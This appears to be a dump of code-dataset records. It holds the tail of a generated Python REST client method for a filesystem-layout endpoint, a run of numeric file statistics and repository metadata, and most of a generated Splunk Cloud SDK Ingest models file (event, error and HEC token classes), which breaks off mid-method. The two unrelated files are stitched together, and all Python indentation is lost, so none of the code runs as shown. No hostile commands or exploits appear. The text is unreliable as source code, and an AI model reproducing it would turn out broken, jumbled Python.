"""updates a filesystemlayout. if the filesystemlayout was changed since this one was read, a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutUpdateRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.update_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
def update_filesystem_layout_with_http_info(self, body, **kwargs): # noqa: E501
"""updates a filesystemlayout. if the filesystemlayout was changed since this one was read, a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_filesystem_layout_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutUpdateRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_filesystem_layout" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_filesystem_layout`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/filesystemlayout', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1FilesystemLayoutResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.834278
| 156
| 0.615458
| 3,040
| 27,417
| 5.302303
| 0.067105
| 0.046157
| 0.024319
| 0.031267
| 0.95893
| 0.95893
| 0.953037
| 0.940505
| 0.940505
| 0.940505
| 0
| 0.016839
| 0.296021
| 27,417
| 705
| 157
| 38.889362
| 0.8183
| 0.328665
| 0
| 0.827225
| 0
| 0
| 0.177205
| 0.062174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039267
| false
| 0
| 0.010471
| 0
| 0.10733
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8fe4f97a68daea78c591a8bfef2d60f792348c8
| 64,579
|
py
|
Python
|
splunk_sdk/ingest/v1beta2/gen_models.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2019-08-01T06:16:17.000Z
|
2021-04-16T20:00:02.000Z
|
splunk_sdk/ingest/v1beta2/gen_models.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2020-09-27T12:03:24.000Z
|
2021-08-06T18:01:32.000Z
|
splunk_sdk/ingest/v1beta2/gen_models.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2019-08-20T17:49:27.000Z
|
2022-03-27T16:39:10.000Z
|
# Copyright © 2021 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
############# This file is auto-generated. Do not edit! #############
"""
SDC Service: Ingest API
Use the Ingest service in Splunk Cloud Services to send event and metrics data, or upload a static file, to Splunk Cloud Services.
OpenAPI spec version: v1beta2.32 (recommended default)
Generated by: https://openapi-generator.tech
"""
from datetime import datetime
from typing import List, Dict
from splunk_sdk.common.sscmodel import SSCModel
from splunk_sdk.base_client import dictify, inflate
from enum import Enum
class Error(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "Error":
instance = Error.__new__(Error)
instance._attrs = model
return instance
def __init__(self, code: "str" = None, details: "object" = None, message: "str" = None, **extra):
"""Error"""
self._attrs = dict()
if code is not None:
self._attrs["code"] = code
if details is not None:
self._attrs["details"] = details
if message is not None:
self._attrs["message"] = message
for k, v in extra.items():
self._attrs[k] = v
@property
def code(self) -> "str":
""" Gets the code of this Error.
"""
return self._attrs.get("code")
@code.setter
def code(self, code: "str"):
"""Sets the code of this Error.
:param code: The code of this Error.
:type: str
"""
self._attrs["code"] = code
@property
def details(self) -> "dict":
""" Gets the details of this Error.
"""
return self._attrs.get("details")
@details.setter
def details(self, details: "dict"):
"""Sets the details of this Error.
:param details: The details of this Error.
:type: object
"""
self._attrs["details"] = details
@property
def message(self) -> "str":
""" Gets the message of this Error.
"""
return self._attrs.get("message")
@message.setter
def message(self, message: "str"):
"""Sets the message of this Error.
:param message: The message of this Error.
:type: str
"""
self._attrs["message"] = message
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class Event(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "Event":
instance = Event.__new__(Event)
instance._attrs = model
return instance
def __init__(self, body: "object", attributes: "Dict[str, object]" = None, host: "str" = None, id: "str" = None, nanos: "int" = None, source: "str" = None, sourcetype: "str" = None, timestamp: "int" = None, **extra):
"""Event"""
self._attrs = dict()
if body is not None:
self._attrs["body"] = body
if attributes is not None:
self._attrs["attributes"] = attributes
if host is not None:
self._attrs["host"] = host
if id is not None:
self._attrs["id"] = id
if nanos is not None:
self._attrs["nanos"] = nanos
if source is not None:
self._attrs["source"] = source
if sourcetype is not None:
self._attrs["sourcetype"] = sourcetype
if timestamp is not None:
self._attrs["timestamp"] = timestamp
for k, v in extra.items():
self._attrs[k] = v
@property
def body(self) -> "object":
""" Gets the body of this Event.
The raw event content. It can be a string, number, string array, number array, JSON object, map, list, a JSON array, or a byte array.
"""
return self._attrs.get("body")
@body.setter
def body(self, body: "object"):
"""Sets the body of this Event.
The raw event content. It can be a string, number, string array, number array, JSON object, map, list, a JSON array, or a byte array.
:param body: The body of this Event.
:type: object
"""
if body is None:
raise ValueError("Invalid value for `body`, must not be `None`")
self._attrs["body"] = body
@property
def attributes(self) -> "dict":
""" Gets the attributes of this Event.
Specifies a JSON object that contains explicit custom fields to be defined at index time.
"""
return self._attrs.get("attributes")
@attributes.setter
def attributes(self, attributes: "dict"):
"""Sets the attributes of this Event.
Specifies a JSON object that contains explicit custom fields to be defined at index time.
:param attributes: The attributes of this Event.
:type: Dict[str, object]
"""
self._attrs["attributes"] = attributes
@property
def host(self) -> "str":
""" Gets the host of this Event.
The host value assigned to the event data. Typically, this is the hostname of the client from which you are sending data.
"""
return self._attrs.get("host")
@host.setter
def host(self, host: "str"):
"""Sets the host of this Event.
The host value assigned to the event data. Typically, this is the hostname of the client from which you are sending data.
:param host: The host of this Event.
:type: str
"""
self._attrs["host"] = host
@property
def id(self) -> "str":
""" Gets the id of this Event.
An optional ID that uniquely identifies the event data. It is used to deduplicate the data if same data is set multiple times. If ID is not specified, it will be assigned by the system.
"""
return self._attrs.get("id")
@id.setter
def id(self, id: "str"):
"""Sets the id of this Event.
An optional ID that uniquely identifies the event data. It is used to deduplicate the data if same data is set multiple times. If ID is not specified, it will be assigned by the system.
:param id: The id of this Event.
:type: str
"""
self._attrs["id"] = id
@property
def nanos(self) -> "int":
""" Gets the nanos of this Event.
Optional nanoseconds part of the timestamp.
"""
return self._attrs.get("nanos")
@nanos.setter
def nanos(self, nanos: "int"):
"""Sets the nanos of this Event.
Optional nanoseconds part of the timestamp.
:param nanos: The nanos of this Event.
:type: int
"""
self._attrs["nanos"] = nanos
@property
def source(self) -> "str":
""" Gets the source of this Event.
The source value to assign to the event data. For example, if you are sending data from an app that you are developing, set this key to the name of the app.
"""
return self._attrs.get("source")
@source.setter
def source(self, source: "str"):
"""Sets the source of this Event.
The source value to assign to the event data. For example, if you are sending data from an app that you are developing, set this key to the name of the app.
:param source: The source of this Event.
:type: str
"""
self._attrs["source"] = source
@property
def sourcetype(self) -> "str":
""" Gets the sourcetype of this Event.
The sourcetype value assigned to the event data.
"""
return self._attrs.get("sourcetype")
@sourcetype.setter
def sourcetype(self, sourcetype: "str"):
"""Sets the sourcetype of this Event.
The sourcetype value assigned to the event data.
:param sourcetype: The sourcetype of this Event.
:type: str
"""
self._attrs["sourcetype"] = sourcetype
@property
def timestamp(self) -> "int":
""" Gets the timestamp of this Event.
Epoch time in milliseconds.
"""
return self._attrs.get("timestamp")
@timestamp.setter
def timestamp(self, timestamp: "int"):
"""Sets the timestamp of this Event.
Epoch time in milliseconds.
:param timestamp: The timestamp of this Event.
:type: int
"""
self._attrs["timestamp"] = timestamp
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class FileUploadDetails(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "FileUploadDetails":
instance = FileUploadDetails.__new__(FileUploadDetails)
instance._attrs = model
return instance
def __init__(self, filename: "str" = None, **extra):
"""FileUploadDetails"""
self._attrs = dict()
if filename is not None:
self._attrs["filename"] = filename
for k, v in extra.items():
self._attrs[k] = v
@property
def filename(self) -> "str":
""" Gets the filename of this FileUploadDetails.
"""
return self._attrs.get("filename")
@filename.setter
def filename(self, filename: "str"):
"""Sets the filename of this FileUploadDetails.
:param filename: The filename of this FileUploadDetails.
:type: str
"""
self._attrs["filename"] = filename
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class HECTokenAccessResponse(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "HECTokenAccessResponse":
instance = HECTokenAccessResponse.__new__(HECTokenAccessResponse)
instance._attrs = model
return instance
def __init__(self, ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, created_at: "datetime" = None, created_by: "str" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, last_modified_at: "datetime" = None, last_modified_by: "str" = None, name: "str" = None, source: "str" = None, sourcetype: "str" = None, tenant: "str" = None, **extra):
"""HECTokenAccessResponse"""
self._attrs = dict()
if ack_enabled is not None:
self._attrs["ack_enabled"] = ack_enabled
if allow_query_string_auth is not None:
self._attrs["allow_query_string_auth"] = allow_query_string_auth
if created_at is not None:
self._attrs["created_at"] = created_at
if created_by is not None:
self._attrs["created_by"] = created_by
if description is not None:
self._attrs["description"] = description
if disabled is not None:
self._attrs["disabled"] = disabled
if index is not None:
self._attrs["index"] = index
if indexes is not None:
self._attrs["indexes"] = indexes
if last_modified_at is not None:
self._attrs["last_modified_at"] = last_modified_at
if last_modified_by is not None:
self._attrs["last_modified_by"] = last_modified_by
if name is not None:
self._attrs["name"] = name
if source is not None:
self._attrs["source"] = source
if sourcetype is not None:
self._attrs["sourcetype"] = sourcetype
if tenant is not None:
self._attrs["tenant"] = tenant
for k, v in extra.items():
self._attrs[k] = v
@property
def ack_enabled(self) -> "bool":
""" Gets the ack_enabled of this HECTokenAccessResponse.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: bool
"""
return self._attrs.get("ack_enabled")
@ack_enabled.setter
def ack_enabled(self, ack_enabled: "bool"):
"""Sets the ack_enabled of this HECTokenAccessResponse.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: bool
:param ack_enabled: The ack_enabled of this HECTokenAccessResponse.
:type: bool
"""
self._attrs["ack_enabled"] = ack_enabled
@property
def allow_query_string_auth(self) -> "bool":
""" Gets the allow_query_string_auth of this HECTokenAccessResponse.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: bool
"""
return self._attrs.get("allow_query_string_auth")
@allow_query_string_auth.setter
def allow_query_string_auth(self, allow_query_string_auth: "bool"):
"""Sets the allow_query_string_auth of this HECTokenAccessResponse.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: bool
:param allow_query_string_auth: The allow_query_string_auth of this HECTokenAccessResponse.
:type: bool
"""
self._attrs["allow_query_string_auth"] = allow_query_string_auth
@property
def created_at(self) -> "datetime":
""" Gets the created_at of this HECTokenAccessResponse.
created_at is a timestamp that captures when this token was created. type: string format: date-time
"""
return self._attrs.get("created_at")
@created_at.setter
def created_at(self, created_at: "datetime"):
"""Sets the created_at of this HECTokenAccessResponse.
created_at is a timestamp that captures when this token was created. type: string format: date-time
:param created_at: The created_at of this HECTokenAccessResponse.
:type: datetime
"""
self._attrs["created_at"] = created_at
@property
def created_by(self) -> "str":
""" Gets the created_by of this HECTokenAccessResponse.
created_by is the principal that created the token. type: string
"""
return self._attrs.get("created_by")
@created_by.setter
def created_by(self, created_by: "str"):
"""Sets the created_by of this HECTokenAccessResponse.
created_by is the principal that created the token. type: string
:param created_by: The created_by of this HECTokenAccessResponse.
:type: str
"""
self._attrs["created_by"] = created_by
@property
def description(self) -> "str":
""" Gets the description of this HECTokenAccessResponse.
description is an optional description of the token. type: string
"""
return self._attrs.get("description")
@description.setter
def description(self, description: "str"):
"""Sets the description of this HECTokenAccessResponse.
description is an optional description of the token. type: string
:param description: The description of this HECTokenAccessResponse.
:type: str
"""
self._attrs["description"] = description
@property
def disabled(self) -> "bool":
""" Gets the disabled of this HECTokenAccessResponse.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: bool
"""
return self._attrs.get("disabled")
@disabled.setter
def disabled(self, disabled: "bool"):
"""Sets the disabled of this HECTokenAccessResponse.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: bool
:param disabled: The disabled of this HECTokenAccessResponse.
:type: bool
"""
self._attrs["disabled"] = disabled
@property
def index(self) -> "str":
""" Gets the index of this HECTokenAccessResponse.
index is the default value of the index field for records collected using this token. type: string
"""
return self._attrs.get("index")
@index.setter
def index(self, index: "str"):
"""Sets the index of this HECTokenAccessResponse.
index is the default value of the index field for records collected using this token. type: string
:param index: The index of this HECTokenAccessResponse.
:type: str
"""
self._attrs["index"] = index
@property
def indexes(self) -> "List[str]":
""" Gets the indexes of this HECTokenAccessResponse.
indexes is a list of index names that this token is allowed to send events to type: []string
"""
return self._attrs.get("indexes")
@indexes.setter
def indexes(self, indexes: "List[str]"):
"""Sets the indexes of this HECTokenAccessResponse.
indexes is a list of index names that this token is allowed to send events to type: []string
:param indexes: The indexes of this HECTokenAccessResponse.
:type: List[str]
"""
self._attrs["indexes"] = indexes
@property
def last_modified_at(self) -> "datetime":
""" Gets the last_modified_at of this HECTokenAccessResponse.
last_modified_at is a timestamp that captures when this token was last modified. type: string format: date-time
"""
return self._attrs.get("last_modified_at")
@last_modified_at.setter
def last_modified_at(self, last_modified_at: "datetime"):
"""Sets the last_modified_at of this HECTokenAccessResponse.
last_modified_at is a timestamp that captures when this token was last modified. type: string format: date-time
:param last_modified_at: The last_modified_at of this HECTokenAccessResponse.
:type: datetime
"""
self._attrs["last_modified_at"] = last_modified_at
@property
def last_modified_by(self) -> "str":
""" Gets the last_modified_by of this HECTokenAccessResponse.
last_modified_by is the principal that last modified the token. type: string
"""
return self._attrs.get("last_modified_by")
@last_modified_by.setter
def last_modified_by(self, last_modified_by: "str"):
"""Sets the last_modified_by of this HECTokenAccessResponse.
last_modified_by is the principal that last modified the token. type: string
:param last_modified_by: The last_modified_by of this HECTokenAccessResponse.
:type: str
"""
self._attrs["last_modified_by"] = last_modified_by
@property
def name(self) -> "str":
""" Gets the name of this HECTokenAccessResponse.
name is the name of the token (unique within the tenant that it belongs to). type: string
"""
return self._attrs.get("name")
@name.setter
def name(self, name: "str"):
"""Sets the name of this HECTokenAccessResponse.
name is the name of the token (unique within the tenant that it belongs to). type: string
:param name: The name of this HECTokenAccessResponse.
:type: str
"""
self._attrs["name"] = name
@property
def source(self) -> "str":
""" Gets the source of this HECTokenAccessResponse.
source is the default value of the source field for records collected using this token. type: string
"""
return self._attrs.get("source")
@source.setter
def source(self, source: "str"):
"""Sets the source of this HECTokenAccessResponse.
source is the default value of the source field for records collected using this token. type: string
:param source: The source of this HECTokenAccessResponse.
:type: str
"""
self._attrs["source"] = source
@property
def sourcetype(self) -> "str":
""" Gets the sourcetype of this HECTokenAccessResponse.
sourcetype is the default value of the sourcetype field for records collected using this token. type: string
"""
return self._attrs.get("sourcetype")
@sourcetype.setter
def sourcetype(self, sourcetype: "str"):
"""Sets the sourcetype of this HECTokenAccessResponse.
sourcetype is the default value of the sourcetype field for records collected using this token. type: string
:param sourcetype: The sourcetype of this HECTokenAccessResponse.
:type: str
"""
self._attrs["sourcetype"] = sourcetype
@property
def tenant(self) -> "str":
""" Gets the tenant of this HECTokenAccessResponse.
tenant is the tenant that this token belongs to type: string
"""
return self._attrs.get("tenant")
@tenant.setter
def tenant(self, tenant: "str"):
"""Sets the tenant of this HECTokenAccessResponse.
tenant is the tenant that this token belongs to type: string
:param tenant: The tenant of this HECTokenAccessResponse.
:type: str
"""
self._attrs["tenant"] = tenant
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class HECTokenCreateRequest(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "HECTokenCreateRequest":
instance = HECTokenCreateRequest.__new__(HECTokenCreateRequest)
instance._attrs = model
return instance
def __init__(self, name: "str", ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, source: "str" = None, sourcetype: "str" = None, **extra):
"""HECTokenCreateRequest"""
self._attrs = dict()
if name is not None:
self._attrs["name"] = name
if ack_enabled is not None:
self._attrs["ack_enabled"] = ack_enabled
if allow_query_string_auth is not None:
self._attrs["allow_query_string_auth"] = allow_query_string_auth
if description is not None:
self._attrs["description"] = description
if disabled is not None:
self._attrs["disabled"] = disabled
if index is not None:
self._attrs["index"] = index
if indexes is not None:
self._attrs["indexes"] = indexes
if source is not None:
self._attrs["source"] = source
if sourcetype is not None:
self._attrs["sourcetype"] = sourcetype
for k, v in extra.items():
self._attrs[k] = v
@property
def name(self) -> "str":
""" Gets the name of this HECTokenCreateRequest.
name is the name of the token (unique within the tenant that it belongs to). type: string
"""
return self._attrs.get("name")
@name.setter
def name(self, name: "str"):
"""Sets the name of this HECTokenCreateRequest.
name is the name of the token (unique within the tenant that it belongs to). type: string
:param name: The name of this HECTokenCreateRequest.
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`")
self._attrs["name"] = name
@property
def ack_enabled(self) -> "bool":
""" Gets the ack_enabled of this HECTokenCreateRequest.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: bool
"""
return self._attrs.get("ack_enabled")
@ack_enabled.setter
def ack_enabled(self, ack_enabled: "bool"):
"""Sets the ack_enabled of this HECTokenCreateRequest.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: bool
:param ack_enabled: The ack_enabled of this HECTokenCreateRequest.
:type: bool
"""
self._attrs["ack_enabled"] = ack_enabled
@property
def allow_query_string_auth(self) -> "bool":
""" Gets the allow_query_string_auth of this HECTokenCreateRequest.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: bool
"""
return self._attrs.get("allow_query_string_auth")
@allow_query_string_auth.setter
def allow_query_string_auth(self, allow_query_string_auth: "bool"):
"""Sets the allow_query_string_auth of this HECTokenCreateRequest.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: bool
:param allow_query_string_auth: The allow_query_string_auth of this HECTokenCreateRequest.
:type: bool
"""
self._attrs["allow_query_string_auth"] = allow_query_string_auth
@property
def description(self) -> "str":
""" Gets the description of this HECTokenCreateRequest.
description is an optional description of the token. type: string
"""
return self._attrs.get("description")
@description.setter
def description(self, description: "str"):
"""Sets the description of this HECTokenCreateRequest.
description is an optional description of the token. type: string
:param description: The description of this HECTokenCreateRequest.
:type: str
"""
self._attrs["description"] = description
@property
def disabled(self) -> "bool":
""" Gets the disabled of this HECTokenCreateRequest.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: bool
"""
return self._attrs.get("disabled")
@disabled.setter
def disabled(self, disabled: "bool"):
"""Sets the disabled of this HECTokenCreateRequest.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: bool
:param disabled: The disabled of this HECTokenCreateRequest.
:type: bool
"""
self._attrs["disabled"] = disabled
@property
def index(self) -> "str":
""" Gets the index of this HECTokenCreateRequest.
index is the default value of the index field for records collected using this token. type: string
"""
return self._attrs.get("index")
@index.setter
def index(self, index: "str"):
"""Sets the index of this HECTokenCreateRequest.
index is the default value of the index field for records collected using this token. type: string
:param index: The index of this HECTokenCreateRequest.
:type: str
"""
self._attrs["index"] = index
@property
def indexes(self) -> "List[str]":
""" Gets the indexes of this HECTokenCreateRequest.
indexes is a list of index names that this token is allowed to send events to type: []string
"""
return self._attrs.get("indexes")
@indexes.setter
def indexes(self, indexes: "List[str]"):
"""Sets the indexes of this HECTokenCreateRequest.
indexes is a list of index names that this token is allowed to send events to type: []string
:param indexes: The indexes of this HECTokenCreateRequest.
:type: List[str]
"""
self._attrs["indexes"] = indexes
@property
def source(self) -> "str":
""" Gets the source of this HECTokenCreateRequest.
source is the default value of the source field for records collected using this token. type: string
"""
return self._attrs.get("source")
@source.setter
def source(self, source: "str"):
"""Sets the source of this HECTokenCreateRequest.
source is the default value of the source field for records collected using this token. type: string
:param source: The source of this HECTokenCreateRequest.
:type: str
"""
self._attrs["source"] = source
@property
def sourcetype(self) -> "str":
""" Gets the sourcetype of this HECTokenCreateRequest.
sourcetype is the default value of the sourcetype field for records collected using this token. type: string
"""
return self._attrs.get("sourcetype")
@sourcetype.setter
def sourcetype(self, sourcetype: "str"):
"""Sets the sourcetype of this HECTokenCreateRequest.
sourcetype is the default value of the sourcetype field for records collected using this token. type: string
:param sourcetype: The sourcetype of this HECTokenCreateRequest.
:type: str
"""
self._attrs["sourcetype"] = sourcetype
def to_dict(self):
return {k: v for (k, v) in self._attrs.items() if v is not None}
class HECTokenCreateResponse(SSCModel):
@staticmethod
def _from_dict(model: dict) -> "HECTokenCreateResponse":
instance = HECTokenCreateResponse.__new__(HECTokenCreateResponse)
instance._attrs = model
return instance
def __init__(self, ack_enabled: "bool" = None, allow_query_string_auth: "bool" = None, created_at: "datetime" = None, created_by: "str" = None, description: "str" = None, disabled: "bool" = None, index: "str" = None, indexes: "List[str]" = None, last_modified_at: "datetime" = None, last_modified_by: "str" = None, name: "str" = None, source: "str" = None, sourcetype: "str" = None, tenant: "str" = None, token: "str" = None, **extra):
"""HECTokenCreateResponse"""
self._attrs = dict()
if ack_enabled is not None:
self._attrs["ack_enabled"] = ack_enabled
if allow_query_string_auth is not None:
self._attrs["allow_query_string_auth"] = allow_query_string_auth
if created_at is not None:
self._attrs["created_at"] = created_at
if created_by is not None:
self._attrs["created_by"] = created_by
if description is not None:
self._attrs["description"] = description
if disabled is not None:
self._attrs["disabled"] = disabled
if index is not None:
self._attrs["index"] = index
if indexes is not None:
self._attrs["indexes"] = indexes
if last_modified_at is not None:
self._attrs["last_modified_at"] = last_modified_at
if last_modified_by is not None:
self._attrs["last_modified_by"] = last_modified_by
if name is not None:
self._attrs["name"] = name
if source is not None:
self._attrs["source"] = source
if sourcetype is not None:
self._attrs["sourcetype"] = sourcetype
if tenant is not None:
self._attrs["tenant"] = tenant
if token is not None:
self._attrs["token"] = token
for k, v in extra.items():
self._attrs[k] = v
@property
def ack_enabled(self) -> "bool":
""" Gets the ack_enabled of this HECTokenCreateResponse.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: bool
"""
return self._attrs.get("ack_enabled")
@ack_enabled.setter
def ack_enabled(self, ack_enabled: "bool"):
"""Sets the ack_enabled of this HECTokenCreateResponse.
ack_enabled is set to true if events sent with the auth token should support indexer acknowledgement type: bool
:param ack_enabled: The ack_enabled of this HECTokenCreateResponse.
:type: bool
"""
self._attrs["ack_enabled"] = ack_enabled
@property
def allow_query_string_auth(self) -> "bool":
""" Gets the allow_query_string_auth of this HECTokenCreateResponse.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: bool
"""
return self._attrs.get("allow_query_string_auth")
@allow_query_string_auth.setter
def allow_query_string_auth(self, allow_query_string_auth: "bool"):
"""Sets the allow_query_string_auth of this HECTokenCreateResponse.
allow_query_string_auth is set to true if this token can be passed into the ingest endpoint's query parameter for auth type: bool
:param allow_query_string_auth: The allow_query_string_auth of this HECTokenCreateResponse.
:type: bool
"""
self._attrs["allow_query_string_auth"] = allow_query_string_auth
@property
def created_at(self) -> "datetime":
""" Gets the created_at of this HECTokenCreateResponse.
created_at is a timestamp that captures when this token was created. type: string format: date-time
"""
return self._attrs.get("created_at")
@created_at.setter
def created_at(self, created_at: "datetime"):
"""Sets the created_at of this HECTokenCreateResponse.
created_at is a timestamp that captures when this token was created. type: string format: date-time
:param created_at: The created_at of this HECTokenCreateResponse.
:type: datetime
"""
self._attrs["created_at"] = created_at
@property
def created_by(self) -> "str":
""" Gets the created_by of this HECTokenCreateResponse.
created_by is the principal that created the token. type: string
"""
return self._attrs.get("created_by")
@created_by.setter
def created_by(self, created_by: "str"):
"""Sets the created_by of this HECTokenCreateResponse.
created_by is the principal that created the token. type: string
:param created_by: The created_by of this HECTokenCreateResponse.
:type: str
"""
self._attrs["created_by"] = created_by
@property
def description(self) -> "str":
""" Gets the description of this HECTokenCreateResponse.
description is an optional description of the token. type: string
"""
return self._attrs.get("description")
@description.setter
def description(self, description: "str"):
"""Sets the description of this HECTokenCreateResponse.
description is an optional description of the token. type: string
:param description: The description of this HECTokenCreateResponse.
:type: str
"""
self._attrs["description"] = description
@property
def disabled(self) -> "bool":
""" Gets the disabled of this HECTokenCreateResponse.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: bool
"""
return self._attrs.get("disabled")
@disabled.setter
def disabled(self, disabled: "bool"):
"""Sets the disabled of this HECTokenCreateResponse.
disabled is set to true if this auth token has been disabled and cannot be used to send events to HECv1 type: bool
:param disabled: The disabled of this HECTokenCreateResponse.
:type: bool
"""
self._attrs["disabled"] = disabled
@property
def index(self) -> "str":
""" Gets the index of this HECTokenCreateResponse.
index is the default value of the index field for records collected using this token. type: string
"""
return self._attrs.get("index")
@index.setter
def index(self, index: "str"):
"""Sets the index of this HECTokenCreateResponse.
index is the default value of the index field for records collected using this token. type: string
:param index: The index of this HECTokenCreateResponse.
:type: str
"""
self._attrs["index"] = index
@property
def indexes(self) -> "List[str]":
""" Gets the indexes of this HECTokenCreateResponse.
indexes is a list of index names that this token is allowed to send events to type: []string
"""
return self._attrs.get("indexes")
@indexes.setter
def indexes(self, indexes: "List[str]"):
"""Sets the indexes of this HECTokenCreateResponse.
indexes is a list of index names that this token is allowed to send events to type: []string
:param indexes: The indexes of this HECTokenCreateResponse.
:type: List[str]
"""
self._attrs["indexes"] = indexes
@property
def last_modified_at(self) -> "datetime":
""" Gets the last_modified_at of this HECTokenCreateResponse.
last_modified_at is a timestamp that captures when this token was last modified. type: string format: date-time
"""
return self._attrs.get("last_modified_at")
@last_modified_at.setter
def last_modified_at(self, last_modified_at: "datetime"):
"""Sets the last_modified_at of this HECTokenCreateResponse.
last_modified_at is a timestamp that captures when this token was last modified. type: string format: date-time
:param last_modified_at: The last_modified_at of this HECTokenCreateResponse.
:type: datetime
"""
self._attrs["last_modified_at"] = last_modified_at
@property
def last_modified_by(self) -> "str":
""" Gets the last_modified_by of this HECTokenCreateResponse.
last_modified_by is the principal that last modified the token. type: string
"""
return self._attrs.get("last_modified_by")
@last_modified_by.setter
def last_modified_by(self, last_modified_by: "str"):
"""Sets the last_modified_by of this HECTokenCreateResponse.
last_modified_by is the principal that last modified the token. type: string
:param last_modified_by: The last_modified_by of this HECTokenCreateResponse.
:type: str
"""
self._attrs["last_modified_by"] = last_modified_by
@property
def name(self) -> "str":
""" Gets the name of this HECTokenCreateResponse.
name is the name of the token (unique within the tenant that it belongs to). type: string
"""
return self._attrs.get("name")
@name.setter
def name(self, name: "str"):
"""Sets the name of this HECTokenCreateResponse.
name is the name of the token (unique within the tenant that it belongs to). type: string
:param name: The name of this HECTokenCreateResponse.
:type: str
"""
self._attrs["name"] = name
@property
def source(self) -> "str":
""" Gets the source of this HECTokenCreateResponse.
source is the default value of the source field for records collected using this token. type: string
"""
return self._attrs.get("source")
@source.setter
def source(self, source: "str"):
"""Sets the source of this HECTokenCreateResponse.
source is the default value of the source field for records collected using this token. type: string
:param source: The source of this HECTokenCreateResponse.
:type: str
"""
self._attrs["source"] = source
@property
def sourcetype(self) -> "str":
""" Gets the sourcetype of this HECTokenCreateResponse.
sourcetype is the default value of the sourcetype field for records collected using this token. type: string
"""
return self._attrs.get("sourcetype")
@sourcetype.setter
